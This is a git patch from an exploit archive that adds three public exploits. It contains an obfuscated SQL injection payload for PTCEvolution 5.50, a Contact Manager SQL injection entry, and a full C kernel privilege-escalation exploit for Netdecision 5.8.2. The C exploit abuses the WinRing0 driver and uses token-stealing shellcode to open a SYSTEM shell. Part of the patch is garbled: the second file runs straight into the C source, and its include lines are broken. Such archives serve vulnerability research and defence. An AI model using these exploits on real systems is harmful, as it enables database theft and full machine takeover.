From bc6f82924cc58133278e780df89fedfef3d7b3ce Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 18 Sep 2017 05:01:20 +0000
Subject: [PATCH] DB: 2017-09-18
3 new exploits
Netdecision 5.8.2 - Local Privilege Escalation
PTCEvolution 5.50 - SQL Injection
Contact Manager 1.0 - 'femail' Parameter SQL Injection
---
 files.csv | 3 +
 platforms/php/webapps/42733.txt | 28 +++
 platforms/php/webapps/42734.txt | 51 ++++++
 platforms/windows/local/42735.c | 313 ++++++++++++++++++++++++++++++++
 4 files changed, 395 insertions(+)
 create mode 100755 platforms/php/webapps/42733.txt
 create mode 100755 platforms/php/webapps/42734.txt
 create mode 100755 platforms/windows/local/42735.c
diff --git a/files.csv b/files.csv
index a8ac268ed..37808eed7 100644
--- a/files.csv
+++ b/files.csv
@@ -9236,6 +9236,7 @@ id,file,description,date,author,platform,type,port
 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0
 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
+42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38511,3 +38512,5 @@ id,file,description,date,author,platform,type,port
 42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0
 42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0
 42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0
+42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
+42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42733.txt b/platforms/php/webapps/42733.txt
new file mode 100755
index 000000000..ba4471e95
--- /dev/null
+++ b/platforms/php/webapps/42733.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: PTCEvolution 5.50 - SQL Injection
+# Dork: N/A
+# Date: 15.09.2017
+# Vendor Homepage: http://ptcevolution.com/
+# Software Link: http://www.ptcevolution.com/demoo/
+# Demo: http://demo.ptcevolution.com/
+# Version: 5.50
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?view=product&id=[SQL]
+# http://localhost/[PATH]/index.php?view=products&id=[SQL]
+#
+# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42734.txt b/platforms/php/webapps/42734.txt
new file mode 100755
index 000000000..19c23f169
--- /dev/null
+++ b/platforms/php/webapps/42734.txt
@@ -0,0 +1,51 @@ +# # # # # +# Exploit Title: Contact Manager 1.0 - SQL Injection +# Dork: N/A +# Date: 15.09.2017 +# Vendor Homepage: http://savsofteproducts.com/ +# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip +# Demo: http://contactmanagerscript.com/demo/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Vulnerable Source: +# +# ............. +# Forgot Password ? +# +#include +#include +#include +#include + +#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0" + + + +LPCTSTR FileName = (LPCTSTR)DEVICE_NAME; +HANDLE GetDeviceHandle(LPCTSTR FileName) { + HANDLE hFile = NULL; + + hFile = CreateFile(FileName, + GENERIC_READ | GENERIC_WRITE, + 0, + 0, + OPEN_EXISTING, + NULL, + 0); + + return hFile; +} + + +extern ULONG ZwYieldExecution = NULL; +extern PVOID KernelBaseAddressInKernelMode = NULL; +extern HMODULE hKernelInUserMode = NULL; + +VOID GetKiFastSystemCall() { + + SIZE_T ReturnLength; + HMODULE hntdll = NULL; + + ULONG ZwYieldExecution_offset; + + + hntdll = LoadLibraryA("ntdll.dll"); + + if (!hntdll) { + printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError()); + exit(EXIT_FAILURE); + } + + LPVOID drivers[1024]; + DWORD cbNeeded; + + EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded); + KernelBaseAddressInKernelMode = drivers[0]; + + + printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode); + + hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe"); + + if (!hKernelInUserMode) { + printf("[-] Failed to load kernel: 0x%X\n", GetLastError()); + exit; + } + + + printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode); + + + + + ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution"); + + if (!ZwYieldExecution) { + printf("[-] Failed 
to resolve KiFastSystemCall: 0x%X\n", GetLastError()); + exit; + } + + ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode; + printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset); + + + (ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode; + + printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution); + + + if (hntdll) { + FreeLibrary(hntdll); + } + + if (hKernelInUserMode) { + FreeLibrary(hKernelInUserMode); + } + + hntdll = NULL; + + return hKernelInUserMode; + return ZwYieldExecution; +} + + +extern ULONG eip = NULL; +extern ULONG pesp = NULL; +extern ULONG pebp = NULL; +extern ULONG ETHREAD = NULL; + +ULONG Shellcode() { + + ULONG FunctionAddress = ZwYieldExecution; + + __asm { + + pushad + pushfd + xor eax,eax + + mov edi, FunctionAddress ; Address of ZwYieldExection to EDI + + SearchCall: + mov eax, 0xe8 + scasb + jnz SearchCall + + mov ebx, edi + mov ecx, [edi] + add ebx, ecx; EBX points to KiSystemService + add ebx, 0x4 + + lea edi, [ebx - 0x1] + SearchFastCallEntry: + mov eax, 0x00000023 + scasd + jnz SearchFastCallEntry + mov eax, 0xa10f306a + scasd + jnz SearchFastCallEntry + + lea eax,[edi-0x9] + xor edx, edx + mov ecx, 0x176 + + + wrmsr + popfd + popad + + + mov eax,ETHREAD + + mov eax,[eax] + mov eax, [eax+0x050] + mov ecx, eax + mov edx, 0x4 + + FindSystemProcess : + mov eax, [eax + 0x0B8] + sub eax, 0x0B8 + cmp[eax + 0x0B4], edx + jne FindSystemProcess + + + mov edx, [eax + 0x0F8] + mov[ecx + 0x0F8], edx + + ;xor eax, eax + mov esp,pesp + mov ebp,pebp + + push eip + ; int 3 + ret + + } + +} + + + +int main() +{ + HANDLE hlib = NULL; + HANDLE hFile = NULL; + PVOID lpInBuffer = NULL; + ULONG lpOutBuffer = NULL; + ULONG lpBytesReturned; + PVOID BuffAddress = NULL; + SIZE_T BufferSize = 0x1000; + SIZE_T nOutBufferSize = 0x800; + ULONG Interval = 0; + ULONG Shell = &Shellcode; + NTSTATUS NtStatus = NULL; + + + + /* 
Undocumented feature to trigger the vulnerability */ + hlib = LoadLibraryA("ntdll.dll"); + + if (!hlib) { + printf("[-] Failed to load the library: 0x%X\n", GetLastError()); + exit(EXIT_FAILURE); + } + + + GetKiFastSystemCall(); + + /* Allocate memory for our input and output buffers */ + lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + /*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/ + + + lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + //printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer); + + + /* Crafting the input buffer */ + + BuffAddress = (PVOID)(((ULONG)lpInBuffer)); + *(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/ + BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4)); + *(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/ + BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8)); + *(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */ + BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc)); + *(PULONG)BuffAddress = (ULONG)0x00000000; + + + //RtlFillMemory(lpInBuffer, BufferSize, 0x41); + //RtlFillMemory(lpOutBuffer, BufferSize, 0x42); + + + //printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n"); + + hFile = GetDeviceHandle(FileName); + + if (hFile == INVALID_HANDLE_VALUE) { + printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError()); + return 1; + } + else + { + printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n"); + } + + /*Here we calculate the EIP for our return from kernel-mode. 
This exploit does not let us simply adjust the stack and return*/ + + (HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/ + printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip); + (HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/ + printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip); + + /*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/ + DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/ + + ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i); + + printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i); + if (affinity == NULL) { + + printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError()); + exit(1); + } + + ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/ + + /*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */ + + __asm { + + mov pesp, esp + mov pebp, ebp + nop + } + + + DeviceIoControl(hFile, + 0x9C402088, + lpInBuffer, + 0x10, + lpOutBuffer, + 0x20, + &lpBytesReturned, + NULL); + + + + STARTUPINFO info = { sizeof(info) }; + PROCESS_INFORMATION processInfo; + NTSTATUS proc; + LPCSTR command = L"C:\\Windows\\System32\\cmd.exe"; + proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo); + + if (!proc) { + + printf("ERROR 0x%X\r\n", proc); + } + WaitForSingleObject(processInfo.hProcess, INFINITE); + + + exit(0); +} +